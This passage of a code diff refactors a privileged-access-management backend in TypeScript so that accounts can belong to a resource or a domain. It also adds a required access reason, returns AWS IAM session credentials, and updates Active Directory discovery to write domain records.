resource.resourceType, - rotationCredentialsConfigured: !!resource.encryptedRotationAccountCredentials - } + requireReason: await resolveRequireReason(updatedAccount.policyId) }; } catch (err) { if (err instanceof DatabaseError && (err.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation) { @@ -452,8 +537,7 @@ export const pamAccountServiceFactory = ({ const account = await pamAccountDAL.findById(id); if (!account) throw new NotFoundError({ message: `Account with ID '${id}' not found` }); - const resource = await pamResourceDAL.findById(account.resourceId); - if (!resource) throw new NotFoundError({ message: `Resource with ID '${account.resourceId}' not found` }); + const parent = await resolveAccountParent(account); const { permission } = await permissionService.getProjectPermission({ actor: actor.type, @@ -469,9 +553,9 @@ export const pamAccountServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.Delete, subject(ProjectPermissionSub.PamAccounts, { - resourceName: resource.name, accountName: account.name, - resourceType: resource.resourceType, + ...(parent.isResource && { resourceName: parent.name, resourceType: parent.resourceType }), + ...(!parent.isResource && { domainName: parent.name, domainType: parent.domainType }), metadata: accountMeta[id] || [] }) ); @@ -480,13 +564,10 @@ export const pamAccountServiceFactory = ({ return { ...(await decryptAccount(deletedAccount, account.projectId, kmsService)), - resourceType: resource.resourceType, - resource: { - id: resource.id, - name: resource.name, - resourceType: resource.resourceType, - rotationCredentialsConfigured: !!resource.encryptedRotationAccountCredentials - } + ...formatAccountParent({ + resource: parent.isResource ? parent.raw : null, + domain: parent.isResource ? null : parent.raw + }) }; }; @@ -511,58 +592,63 @@ export const pamAccountServiceFactory = ({ const limit = params.limit || 20; const offset = params.offset || 0; - const { accounts: accountsWithResourceDetails, totalCount } = - await pamAccountDAL.findByProjectIdWithResourceDetails({ - projectId, - accountView, - offset, - limit, - search: params.search, - orderBy: params.orderBy, - orderDirection: params.orderDirection, - filterResourceIds: params.filterResourceIds, - metadataFilter: params.metadataFilter - }); + const { accounts: accountsWithParentDetails, totalCount } = await pamAccountDAL.findByProjectIdWithParentDetails({ + projectId, + accountView, + offset, + limit, + search: params.search, + orderBy: params.orderBy, + orderDirection: params.orderDirection, + filterResourceIds: params.filterResourceIds, + filterDomainIds: params.filterDomainIds, + metadataFilter: params.metadataFilter + }); const decryptedAndPermittedAccounts: Array< Omit & { - resource: Pick & { rotationCredentialsConfigured: boolean }; + resource: + | (Pick & { rotationCredentialsConfigured: boolean }) + | null; + domain: { id: string; name: string; domainType: string } | null; credentials: TPamAccountCredentials; lastRotationMessage: string | null; - resourceType: string; } > = []; // Fetch metadata for all accounts before permission loop - const allAccountIds = accountsWithResourceDetails.map((a) => a.id); + const allAccountIds = accountsWithParentDetails.map((a) => a.id); const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds(allAccountIds); - for await (const account of accountsWithResourceDetails) { - // Check permission for each individual account + for await (const account of accountsWithParentDetails) { if ( permission.can( ProjectPermissionPamAccountActions.Read, subject(ProjectPermissionSub.PamAccounts, { - resourceName: account.resource.name, accountName: account.name, - resourceType: account.resource.resourceType, + ...(account.resource && { + resourceName: account.resource.name, + resourceType: account.resource.resourceType + }), + ...(account.domain && { domainName: account.domain.name, domainType: account.domain.domainType }), metadata: metadataByAccountId[account.id] || [] }) ) ) { // Decrypt the account only if the user has permission to read it - const decryptedAccount = await decryptAccount(account, account.projectId, kmsService); + const decryptedAccount = await decryptAccount( + account as Parameters[0], + account.projectId, + kmsService + ); decryptedAndPermittedAccounts.push({ ...decryptedAccount, - resourceType: account.resource.resourceType, - resource: { - id: account.resource.id, - name: account.resource.name, - resourceType: account.resource.resourceType, - rotationCredentialsConfigured: !!account.resource.encryptedRotationAccountCredentials - } - }); + ...formatAccountParent({ + resource: account.resource, + domain: account.domain + }) + } as unknown as (typeof decryptedAndPermittedAccounts)[0]); } } @@ -582,43 +668,47 @@ export const pamAccountServiceFactory = ({ }; const getById = async ({ accountId, actor, actorId, actorAuthMethod, actorOrgId }: TGetAccountByIdDTO) => { - const accountWithResource = await pamAccountDAL.findByIdWithResourceDetails(accountId); - if (!accountWithResource) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + const accountWithParent = await pamAccountDAL.findByIdWithParentDetails(accountId); + if (!accountWithParent) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); const { permission } = await permissionService.getProjectPermission({ actor, actorId, - projectId: accountWithResource.projectId, + projectId: accountWithParent.projectId, actorAuthMethod, actorOrgId, actionProjectType: ActionProjectType.PAM }); - const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([accountWithResource.id]); - const accountMetadata = metadataByAccountId[accountWithResource.id] || []; + const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([accountWithParent.id]); + const accountMetadata = metadataByAccountId[accountWithParent.id] || []; ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.Read, subject(ProjectPermissionSub.PamAccounts, { - resourceName: accountWithResource.resource.name, - accountName: accountWithResource.name, - resourceType: accountWithResource.resource.resourceType, + accountName: accountWithParent.name, + ...(accountWithParent.resource && { + resourceName: accountWithParent.resource.name, + resourceType: accountWithParent.resource.resourceType + }), + ...(accountWithParent.domain && { + domainName: accountWithParent.domain.name, + domainType: accountWithParent.domain.domainType + }), metadata: accountMetadata }) ); - const decryptedAccount = await decryptAccount(accountWithResource, accountWithResource.projectId, kmsService); + const decryptedAccount = await decryptAccount(accountWithParent, accountWithParent.projectId, kmsService); return { ...decryptedAccount, + ...formatAccountParent({ + resource: accountWithParent.resource, + domain: accountWithParent.domain + }), metadata: accountMetadata, - resourceType: accountWithResource.resource.resourceType, - resource: { - id: accountWithResource.resource.id, - name: accountWithResource.resource.name, - resourceType: accountWithResource.resource.resourceType, - rotationCredentialsConfigured: !!accountWithResource.resource.encryptedRotationAccountCredentials - } + requireReason: await resolveRequireReason(accountWithParent.policyId) }; }; @@ -632,7 +722,8 @@ export const pamAccountServiceFactory = ({ actorName, actorUserAgent, duration, - mfaSessionId + mfaSessionId, + reason }: TAccessAccountDTO, actor: OrgServiceActor ) => { @@ -655,6 +746,8 @@ export const pamAccountServiceFactory = ({ }); } + const trimmedReason = reason?.trim() || null; + const fac = APPROVAL_POLICY_FACTORY_MAP[ApprovalPolicyType.PamAccess](ApprovalPolicyType.PamAccess); const inputs = { @@ -703,16 +796,31 @@ export const pamAccountServiceFactory = ({ ); } - const project = await projectDAL.findById(account.projectId); - if (!project) throw new NotFoundError({ message: `Project with ID '${account.projectId}' not found` }); + // Reason check is intentionally placed after the approval/permission gates so + // its distinct error code does not leak policy configuration to unauthorized actors. + if (account.policyId) { + const policy = await pamAccountPolicyDAL.findById(account.policyId); + const policyRules = (policy?.rules ?? {}) as TPolicyRules; + if (policy?.isActive && policyRules[PamAccountPolicyRuleType.RequireReason] && !trimmedReason) { + throw new BadRequestError({ + message: "A reason is required to access this account", + name: "PAM_REASON_REQUIRED" + }); + } + } const actorUser = await userDAL.findById(actor.id); if (!actorUser) throw new NotFoundError({ message: `User with ID '${actor.id}' not found` }); // If no mfaSessionId is provided, create a new MFA session if (!mfaSessionId && account.requireMfa) { - // Get organization to check if MFA is enforced at org level - const org = await orgDAL.findOrgById(project.orgId); + const project = await requestMemoize(requestMemoKeys.projectFindById(account.projectId), () => + projectDAL.findById(account.projectId) + ); + if (!project) throw new NotFoundError({ message: `Project with ID '${account.projectId}' not found` }); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(project.orgId), () => + orgDAL.findOrgById(project.orgId) + ); if (!org) throw new NotFoundError({ message: `Organization with ID '${project.orgId}' not found` }); // Determine which MFA method to use @@ -779,10 +887,6 @@ export const pamAccountServiceFactory = ({ kmsService ); - // Disable access to Active Directory - if (resourceType === PamResource.ActiveDirectory) - throw new BadRequestError({ message: `Active Directory resources cannot be accessed` }); - // Temporarily disable access to Windows Server if (resourceType === PamResource.Windows) throw new BadRequestError({ message: `Windows resources cannot be accessed at this time` }); @@ -797,7 +901,7 @@ export const pamAccountServiceFactory = ({ projectId: account.projectId })) as TAwsIamAccountCredentials; - const { consoleUrl, expiresAt } = await generateConsoleFederationUrl({ + const credentials = await generateAwsIamSessionCredentials({ connectionDetails, targetRoleArn: awsCredentials.targetRoleArn, roleSessionName: actorEmail, @@ -818,23 +922,35 @@ export const pamAccountServiceFactory = ({ accountId: account.id, resourceId: resource.id, userId: actor.id, - expiresAt, - startedAt: new Date() + expiresAt: credentials.expiresAt, + startedAt: new Date(), + reason: trimmedReason }); + // Cache the AccessKeyId so /aws-console-url can verify the caller is + // submitting credentials that actually belong to this session + const ttlSeconds = Math.max(1, Math.floor((credentials.expiresAt.getTime() - Date.now()) / 1000)); + await keyStore.setItemWithExpiry( + KeyStorePrefixes.PamAwsIamAccessKeyId(session.id), + ttlSeconds, + credentials.accessKeyId + ); + // Schedule session expiration job to run at expiresAt - await pamSessionExpirationService.scheduleSessionExpiration(session.id, expiresAt); + await pamSessionExpirationService.scheduleSessionExpiration(session.id, credentials.expiresAt); return { sessionId: session.id, resourceType, account, - consoleUrl, + accessKeyId: credentials.accessKeyId, + secretAccessKey: credentials.secretAccessKey, + sessionToken: credentials.sessionToken, + expiresAt: credentials.expiresAt.toISOString(), metadata: { awsAccountId: extractAwsAccountIdFromArn(connectionDetails.roleArn), targetRoleArn: awsCredentials.targetRoleArn, - federatedUsername: actorEmail, - expiresAt: expiresAt.toISOString() + federatedUsername: actorEmail } }; } @@ -853,7 +969,8 @@ export const pamAccountServiceFactory = ({ accountId: account.id, resourceId: resource.id, userId: actor.id, - expiresAt: new Date(Date.now() + duration) + expiresAt: new Date(Date.now() + duration), + reason: trimmedReason }); if (!gatewayId) { @@ -980,31 +1097,102 @@ export const pamAccountServiceFactory = ({ }; }; + const getAwsIamConsoleUrl = async ( + { + sessionId, + projectId, + accessKeyId, + secretAccessKey, + sessionToken + }: { + sessionId: string; + projectId: string; + accessKeyId: string; + secretAccessKey: string; + sessionToken: string; + }, + actor: OrgServiceActor + ) => { + const session = await pamSessionDAL.findById(sessionId); + if (!session) throw new NotFoundError({ message: `Session with ID '${sessionId}' not found` }); + + if (session.projectId !== projectId) { + throw new ForbiddenRequestError({ message: "Session does not belong to the specified project" }); + } + + if (session.userId !== actor.id) { + throw new ForbiddenRequestError({ message: "Session does not belong to the current user" }); + } + + if (session.resourceType !== PamResource.AwsIam) { + throw new BadRequestError({ message: "Session is not an AWS IAM session" }); + } + + if (session.endedAt || (session.expiresAt && session.expiresAt < new Date())) { + throw new BadRequestError({ message: "Session has ended or expired" }); + } + + // Confirm the submitted creds actually belong to this session by comparing + // against the AccessKeyId we stashed at /access time + const expectedAccessKeyId = await keyStore.getItem(KeyStorePrefixes.PamAwsIamAccessKeyId(sessionId)); + if (!expectedAccessKeyId) { + throw new BadRequestError({ + message: "Session credentials are no longer available. Please re-access the account." + }); + } + if (expectedAccessKeyId !== accessKeyId) { + throw new ForbiddenRequestError({ + message: "Submitted credentials do not match the session" + }); + } + + const consoleUrl = await exchangeCredentialsForConsoleUrl({ + accessKeyId, + secretAccessKey, + sessionToken + }); + + return { + consoleUrl, + accountId: session.accountId, + accountName: session.accountName, + resourceName: session.resourceName + }; + }; + const getSessionCredentials = async (sessionId: string, actor: OrgServiceActor) => { - // To be hit by gateways only - if (actor.type !== ActorType.IDENTITY) { + // To be hit by gateways only (identity-based or enrollment-flow) + if (actor.type !== ActorType.IDENTITY && actor.type !== ActorType.GATEWAY) { throw new ForbiddenRequestError({ message: "Only gateways can perform this action" }); } const session = await pamSessionDAL.findById(sessionId); if (!session) throw new NotFoundError({ message: `Session with ID '${sessionId}' not found` }); - const project = await projectDAL.findById(session.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(session.projectId), () => + projectDAL.findById(session.projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${session.projectId}' not found` }); - const { permission } = await permissionService.getOrgPermission({ - actor: actor.type, - actorId: actor.id, - orgId: project.orgId, - actorAuthMethod: actor.authMethod, - actorOrgId: actor.orgId, - scope: OrganizationActionScope.Any - }); + if (actor.type === ActorType.IDENTITY) { + const { permission } = await permissionService.getOrgPermission({ + actor: actor.type, + actorId: actor.id, + orgId: project.orgId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + scope: OrganizationActionScope.Any + }); - ForbiddenError.from(permission).throwUnlessCan( - OrgPermissionGatewayActions.CreateGateways, - OrgPermissionSubjects.Gateway - ); + ForbiddenError.from(permission).throwUnlessCan( + OrgPermissionGatewayActions.CreateGateways, + OrgPermissionSubjects.Gateway + ); + } else if (actor.type === ActorType.GATEWAY) { + if (project.orgId !== actor.orgId) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to this session" }); + } + } if (!session.accountId) throw new NotFoundError({ message: "Session is missing accountId column" }); @@ -1016,13 +1204,17 @@ export const pamAccountServiceFactory = ({ const account = await pamAccountDAL.findById(session.accountId); if (!account) throw new NotFoundError({ message: `Account with ID '${session.accountId}' not found` }); - const resource = await pamResourceDAL.findById(account.resourceId); + const resource = await pamResourceDAL.findById(account.resourceId!); if (!resource) throw new NotFoundError({ message: `Resource with ID '${account.resourceId}' not found` }); - if (resource.gatewayId && resource.gatewayIdentityId !== actor.id) { - throw new ForbiddenRequestError({ - message: "Identity does not have access to fetch the PAM session credentials" - }); + if (resource.gatewayId) { + const authorized = + actor.type === ActorType.GATEWAY ? resource.gatewayId === actor.id : resource.gatewayIdentityId === actor.id; + if (!authorized) { + throw new ForbiddenRequestError({ + message: "Gateway does not have access to fetch the PAM session credentials" + }); + } } const decryptedAccount = await decryptAccount(account, session.projectId, kmsService); @@ -1035,13 +1227,17 @@ export const pamAccountServiceFactory = ({ const policy = await pamAccountPolicyDAL.findById(account.policyId); if (policy && policy.isActive) { const rules = (policy.rules ?? {}) as TPolicyRules; - for (const ruleType of Object.values(PamAccountPolicyRuleType)) { + + const gatewayRuleTypes = [ + PamAccountPolicyRuleType.CommandBlocking, + PamAccountPolicyRuleType.SessionLogMasking + ] as const; + for (const ruleType of gatewayRuleTypes) { const ruleConfig = rules[ruleType]; - if (ruleConfig) { - const supported = PAM_ACCOUNT_POLICY_RULE_SUPPORTED_RESOURCES[ruleType]; - if (supported === "all" || supported.includes(resource.resourceType as PamResource)) { - policyRules[ruleType] = ruleConfig; - } + const supported = PAM_ACCOUNT_POLICY_RULE_SUPPORTED_RESOURCES[ruleType]; + const isSupported = supported === "all" || supported.includes(resource.resourceType as PamResource); + if (ruleConfig && isSupported) { + policyRules[ruleType] = ruleConfig; } } } @@ -1149,13 +1345,16 @@ export const pamAccountServiceFactory = ({ if (minIntervalSeconds === Infinity) return []; const resourceIdsWithRules = Object.keys(rulesByResource); - const accounts = await pamAccountDAL.findRotationCandidates(resourceIdsWithRules, minIntervalSeconds); + const accounts = await pamAccountDAL.findRotationCandidates({ + resourceIds: resourceIdsWithRules, + minIntervalSeconds + }); const now = Date.now(); const dueAccounts: TPamAccounts[] = []; for (const account of accounts) { - const rules = rulesByResource[account.resourceId]; + const rules = rulesByResource[account.resourceId!]; // eslint-disable-next-line no-continue if (!rules) continue; @@ -1198,7 +1397,7 @@ export const pamAccountServiceFactory = ({ if (!claimed) return; // Read resource - const resource = await pamResourceDAL.findById(account.resourceId); + const resource = await pamResourceDAL.findById(account.resourceId!); if (!resource || !resource.encryptedRotationAccountCredentials) { logger.warn( `[Rotation] Resource or rotation credentials missing for account [accountId=${account.id}], releasing lock` @@ -1366,7 +1565,7 @@ export const pamAccountServiceFactory = ({ metadata: { accountId: account.id, accountName: account.name, - resourceId: account.resourceId, + resourceId: account.resourceId!, resourceType: logResourceType, errorMessage } @@ -1389,60 +1588,61 @@ export const pamAccountServiceFactory = ({ }; const triggerManualRotation = async (accountId: string, actor: OrgServiceActor) => { - const accountWithResource = await pamAccountDAL.findByIdWithResourceDetails(accountId); - if (!accountWithResource) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + const accountWithParent = await pamAccountDAL.findByIdWithParentDetails(accountId); + if (!accountWithParent) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + if (!accountWithParent.resource) + throw new NotFoundError({ message: `Resource not found for account '${accountId}'` }); const { permission } = await permissionService.getProjectPermission({ actor: actor.type, actorAuthMethod: actor.authMethod, actorId: actor.id, actorOrgId: actor.orgId, - projectId: accountWithResource.projectId, + projectId: accountWithParent.projectId, actionProjectType: ActionProjectType.PAM }); ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.TriggerRotation, subject(ProjectPermissionSub.PamAccounts, { - resourceName: accountWithResource.resource.name, - accountName: accountWithResource.name, - resourceType: accountWithResource.resource.resourceType + resourceName: accountWithParent.resource.name, + accountName: accountWithParent.name, + resourceType: accountWithParent.resource.resourceType }) ); - if (!accountWithResource.resource.encryptedRotationAccountCredentials) { + if (!accountWithParent.resource.encryptedRotationAccountCredentials) { throw new BadRequestError({ message: "Rotation credentials are not configured on this resource" }); } // Immediate check. There's an actual atomic lock in rotateAccount - if (accountWithResource.rotationStatus === PamAccountRotationStatus.Rotating) { + if (accountWithParent.rotationStatus === PamAccountRotationStatus.Rotating) { throw new BadRequestError({ message: "Account is already being rotated" }); } - await rotateAccount(accountWithResource); + await rotateAccount(accountWithParent); - const updatedAccountWithResource = await pamAccountDAL.findByIdWithResourceDetails(accountId); - if (!updatedAccountWithResource) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + const updatedAccountWithParent = await pamAccountDAL.findByIdWithParentDetails(accountId); + if (!updatedAccountWithParent) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + if (!updatedAccountWithParent.resource) + throw new NotFoundError({ message: `Resource not found for account '${accountId}'` }); - const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([updatedAccountWithResource.id]); - const accountMetadata = metadataByAccountId[updatedAccountWithResource.id] || []; + const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([updatedAccountWithParent.id]); + const accountMetadata = metadataByAccountId[updatedAccountWithParent.id] || []; const decryptedAccount = await decryptAccount( - updatedAccountWithResource, - updatedAccountWithResource.projectId, + updatedAccountWithParent, + updatedAccountWithParent.projectId, kmsService ); return { ...decryptedAccount, metadata: accountMetadata, - resourceType: updatedAccountWithResource.resource.resourceType, - resource: { - id: updatedAccountWithResource.resource.id, - name: updatedAccountWithResource.resource.name, - resourceType: updatedAccountWithResource.resource.resourceType, - rotationCredentialsConfigured: !!updatedAccountWithResource.resource.encryptedRotationAccountCredentials - } + ...formatAccountParent({ + resource: updatedAccountWithParent.resource, + domain: null + }) }; }; @@ -1454,58 +1654,67 @@ export const pamAccountServiceFactory = ({ actorAuthMethod, actorOrgId }: TViewAccountCredentialsDTO) => { - const accountWithResource = await pamAccountDAL.findByIdWithResourceDetails(accountId); - if (!accountWithResource) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + const accountWithParent = await pamAccountDAL.findByIdWithParentDetails(accountId); + if (!accountWithParent) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + if (!accountWithParent.resource && !accountWithParent.domain) + throw new NotFoundError({ message: `Parent not found for account '${accountId}'` }); const { permission } = await permissionService.getProjectPermission({ actor, actorId, - projectId: accountWithResource.projectId, + projectId: accountWithParent.projectId, actorAuthMethod, actorOrgId, actionProjectType: ActionProjectType.PAM }); - const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([accountWithResource.id]); - const accountMetadata = metadataByAccountId[accountWithResource.id] || []; + const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([accountWithParent.id]); + const accountMetadata = metadataByAccountId[accountWithParent.id] || []; ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.ReadCredentials, subject(ProjectPermissionSub.PamAccounts, { - resourceName: accountWithResource.resource.name, - resourceType: accountWithResource.resource.resourceType, - accountName: accountWithResource.name, + accountName: accountWithParent.name, + ...(accountWithParent.resource && { + resourceName: accountWithParent.resource.name, + resourceType: accountWithParent.resource.resourceType + }), + ...(accountWithParent.domain && { + domainName: accountWithParent.domain.name, + domainType: accountWithParent.domain.domainType + }), metadata: accountMetadata }) ); - // Decrypt early so we can check if there are sensitive fields before triggering MFA + const parentType = accountWithParent.resource?.resourceType || accountWithParent.domain?.domainType || ""; + const credentials = await decryptAccountCredentials({ - encryptedCredentials: accountWithResource.encryptedCredentials, + encryptedCredentials: accountWithParent.encryptedCredentials, kmsService, - projectId: accountWithResource.projectId + projectId: accountWithParent.projectId }); - if (!hasSensitiveCredentials(accountWithResource.resource.resourceType, credentials)) { + if (!hasSensitiveCredentials(parentType, credentials)) { throw new BadRequestError({ message: "This account has no sensitive credentials to view" }); } - if (!mfaSessionId && accountWithResource.requireMfa) { - const project = await projectDAL.findById(accountWithResource.projectId); - if (!project) - throw new NotFoundError({ message: `Project with ID '${accountWithResource.projectId}' not found` }); - + if (!mfaSessionId && accountWithParent.requireMfa) { + // actorOrgId equals project.orgId: getProjectPermission above guarantees project existence + // and org membership, so no separate project lookup is needed to resolve the org ID. const actorUser = await userDAL.findById(actorId); if (!actorUser) throw new NotFoundError({ message: `User with ID '${actorId}' not found` }); - const org = await orgDAL.findOrgById(project.orgId); - if (!org) throw new NotFoundError({ message: `Organization with ID '${project.orgId}' not found` }); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(actorOrgId), () => + orgDAL.findOrgById(actorOrgId) + ); + if (!org) throw new NotFoundError({ message: `Organization with ID '${actorOrgId}' not found` }); const orgMfaMethod = org.enforceMfa ? (org.selectedMfaMethod as MfaMethod | null) : undefined; const userMfaMethod = actorUser.isMfaEnabled ? (actorUser.selectedMfaMethod as MfaMethod | null) : undefined; const mfaMethod = (orgMfaMethod ?? userMfaMethod ?? MfaMethod.EMAIL) as MfaMethod; - const newMfaSessionId = await mfaSessionService.createMfaSession(actorUser.id, accountWithResource.id, mfaMethod); + const newMfaSessionId = await mfaSessionService.createMfaSession(actorUser.id, accountWithParent.id, mfaMethod); if (mfaMethod === MfaMethod.EMAIL && actorUser.email) { await mfaSessionService.sendMfaCode(actorUser.id, actorUser.email); @@ -1521,7 +1730,7 @@ export const pamAccountServiceFactory = ({ }); } - if (mfaSessionId && accountWithResource.requireMfa) { + if (mfaSessionId && accountWithParent.requireMfa) { const mfaSession = await mfaSessionService.getMfaSession(mfaSessionId); if (!mfaSession) { throw new BadRequestError({ message: "MFA session not found or expired" }); @@ -1531,7 +1740,7 @@ export const pamAccountServiceFactory = ({ throw new BadRequestError({ message: "MFA session does not belong to current user" }); } - if (mfaSession.resourceId !== accountWithResource.id) { + if (mfaSession.resourceId !== accountWithParent.id) { throw new BadRequestError({ message: "MFA session is for a different account" }); } @@ -1544,12 +1753,24 @@ export const pamAccountServiceFactory = ({ return { credentials, - resourceType: accountWithResource.resource.resourceType, - accountId: accountWithResource.id, - accountName: accountWithResource.name, - resourceId: accountWithResource.resource.id, - resourceName: accountWithResource.resource.name, - projectId: accountWithResource.projectId + parentType, + accountId: accountWithParent.id, + accountName: accountWithParent.name, + projectId: accountWithParent.projectId, + resource: accountWithParent.resource + ? { + id: accountWithParent.resource.id, + name: accountWithParent.resource.name, + resourceType: accountWithParent.resource.resourceType + } + : null, + domain: accountWithParent.domain + ? { + id: accountWithParent.domain.id, + name: accountWithParent.domain.name, + domainType: accountWithParent.domain.domainType + } + : null }; }; @@ -1560,6 +1781,7 @@ export const pamAccountServiceFactory = ({ list, getById, access, + getAwsIamConsoleUrl, viewCredentials, getSessionCredentials, rotateAllDueAccounts, diff --git a/backend/src/ee/services/pam-account/pam-account-types.ts b/backend/src/ee/services/pam-account/pam-account-types.ts index 7ef92736146..b61e83f9081 100644 --- a/backend/src/ee/services/pam-account/pam-account-types.ts +++ b/backend/src/ee/services/pam-account/pam-account-types.ts @@ -9,8 +9,10 @@ import { PamAccountOrderBy, PamAccountView } from "./pam-account-enums"; // DTOs export type TCreateAccountDTO = Pick< TPamAccount, - "name" | "description" | "credentials" | "folderId" | "resourceId" | "requireMfa" + "name" | "description" | "credentials" | "folderId" | "requireMfa" > & { + resourceId?: string; + domainId?: string; internalMetadata?: Record; metadata?: z.input; policyId?: string | null; @@ -30,6 +32,7 @@ export type TAccessAccountDTO = { actorUserAgent: string; duration: number; mfaSessionId?: string; + reason?: string; }; export type TListAccountsDTO = { @@ -40,6 +43,7 @@ export type TListAccountsDTO = { limit?: number; offset?: number; filterResourceIds?: string[]; + filterDomainIds?: string[]; metadataFilter?: Array<{ key: string; value?: string }>; } & TProjectPermission; diff --git a/backend/src/ee/services/pam-discovery/active-directory/active-directory-discovery-factory.ts b/backend/src/ee/services/pam-discovery/active-directory/active-directory-discovery-factory.ts index d25b83719bc..cfe5231eedc 100644 --- a/backend/src/ee/services/pam-discovery/active-directory/active-directory-discovery-factory.ts +++ b/backend/src/ee/services/pam-discovery/active-directory/active-directory-discovery-factory.ts @@ -20,9 +20,11 @@ import { TPamAccountDALFactory } from "../../pam-account/pam-account-dal"; import { encryptAccountCredentials } from "../../pam-account/pam-account-fns"; import { TActiveDirectoryAccountCredentials, - TActiveDirectoryAccountInternalMetadata, - TActiveDirectoryResourceConnectionDetails -} from "../../pam-resource/active-directory/active-directory-resource-types"; + TActiveDirectoryAccountInternalMetadata +} from "../../pam-domain/active-directory/active-directory-domain-types"; +import { TPamDomainDALFactory } from "../../pam-domain/pam-domain-dal"; +import { PamDomainType } from "../../pam-domain/pam-domain-enums"; +import { encryptDomainConnectionDetails } from "../../pam-domain/pam-domain-fns"; import { TPamResourceDALFactory } from "../../pam-resource/pam-resource-dal"; import { PamResource } from "../../pam-resource/pam-resource-enums"; import { encryptResourceConnectionDetails, encryptResourceInternalMetadata } from "../../pam-resource/pam-resource-fns"; @@ -453,32 +455,32 @@ const executeLdapEnumeration = async ( ); }; -const upsertAdServerResource = async ( +const upsertDomain = async ( projectId: string, configuration: TAdDiscoveryConfiguration, gatewayId: string, kmsService: Pick, - pamResourceDAL: Pick, + pamDomainDAL: Pick, tx: Knex ) => { const fingerprint = configuration.domainFQDN.toLowerCase(); - const existing = await pamResourceDAL.find( + const existing = await pamDomainDAL.find( { projectId, - resourceType: PamResource.ActiveDirectory, + domainType: PamDomainType.ActiveDirectory, discoveryFingerprint: fingerprint }, { tx } ); if (existing.length > 0) { - return { resource: existing[0], isNew: false }; + return { domain: existing[0], isNew: false }; } const domainResourceName = toSlugName(configuration.domainFQDN); - const encryptedConnectionDetails = await encryptResourceConnectionDetails({ + const encryptedConnectionDetails = await encryptDomainConnectionDetails({ projectId, connectionDetails: { domain: configuration.domainFQDN, @@ -488,15 +490,15 @@ const upsertAdServerResource = async ( ldapRejectUnauthorized: configuration.ldapRejectUnauthorized, ldapCaCert: configuration.ldapCaCert, ldapTlsServerName: configuration.ldapTlsServerName - } as TActiveDirectoryResourceConnectionDetails, + }, kmsService }); - const resource = await pamResourceDAL.create( + const domain = await pamDomainDAL.create( { projectId, name: domainResourceName, - resourceType: PamResource.ActiveDirectory, + domainType: PamDomainType.ActiveDirectory, gatewayId, encryptedConnectionDetails, discoveryFingerprint: fingerprint @@ -504,13 +506,14 @@ const upsertAdServerResource = async ( tx ); - return { resource, isNew: true }; + return { domain, isNew: true }; }; const upsertWindowsServerResource = async ( projectId: string, computer: TLdapComputer, - adServerResourceId: string, + domainId: string, + domainFQDN: string, gatewayId: string, winrmConfig: { winrmPort: number; @@ -519,23 +522,29 @@ const upsertWindowsServerResource = async ( winrmCaCert?: string; }, kmsService: Pick, - pamResourceDAL: Pick, + pamResourceDAL: Pick, tx: Knex ) => { - const fingerprint = computer.objectGUID; + const fingerprint = `${domainFQDN.toLowerCase()}:${computer.objectGUID}`; const existing = await pamResourceDAL.find( { projectId, resourceType: PamResource.Windows, - discoveryFingerprint: fingerprint, - adServerResourceId + discoveryFingerprint: fingerprint }, { tx } ); if (existing.length > 0) { - return { resource: existing[0], isNew: false }; + const found = existing[0]; + + // Reconnect if the resource was orphaned (e.g. the domain was previously deleted) + if (!found.domainId) { + const reconnected = await pamResourceDAL.updateById(found.id, { domainId }, tx); + return { resource: reconnected, isNew: false }; + } + return { resource: found, isNew: false }; } const hostname = computer.dNSHostName || computer.cn; @@ -570,7 +579,7 @@ const upsertWindowsServerResource = async ( gatewayId, encryptedConnectionDetails, encryptedResourceMetadata, - adServerResourceId, + domainId, discoveryFingerprint: fingerprint }, tx @@ -582,16 +591,18 @@ const upsertWindowsServerResource = async ( const upsertDomainAccount = async ( projectId: string, user: TLdapUser, - adServerResourceId: string, + domainId: string, + domainFQDN: string, kmsService: Pick, pamAccountDAL: Pick, tx: Knex ) => { - const fingerprint = user.objectGUID; + const fingerprint = `${domainFQDN.toLowerCase()}:${user.objectGUID}`; const existing = await pamAccountDAL.find( { - resourceId: adServerResourceId, + projectId, + domainId, discoveryFingerprint: fingerprint }, { tx } @@ -634,7 +645,7 @@ const upsertDomainAccount = async ( const account = await pamAccountDAL.create( { projectId, - resourceId: adServerResourceId, + domainId, name: accountName, encryptedCredentials, internalMetadata, @@ -781,12 +792,13 @@ const upsertLocalAccount = async ( projectId: string, localUser: TWinRmLocalUser, computerObjectGUID: string, + domainFQDN: string, windowsServerResourceId: string, kmsService: Pick, pamAccountDAL: Pick, tx: Knex ) => { - const fingerprint = `${computerObjectGUID}:${localUser.Name.toLowerCase()}`; + const fingerprint = `${domainFQDN.toLowerCase()}:${computerObjectGUID}:${localUser.Name.toLowerCase()}`; const existing = await pamAccountDAL.find( { @@ -932,6 +944,7 @@ export const activeDirectoryDiscoveryFactory: TPamDiscoveryFactory< pamDiscoverySourceAccountsDAL, pamDiscoverySourceDependenciesDAL, pamAccountDependenciesDAL, + pamDomainDAL, pamResourceDAL, pamAccountDAL, kmsService @@ -985,30 +998,11 @@ export const activeDirectoryDiscoveryFactory: TPamDiscoveryFactory< } as 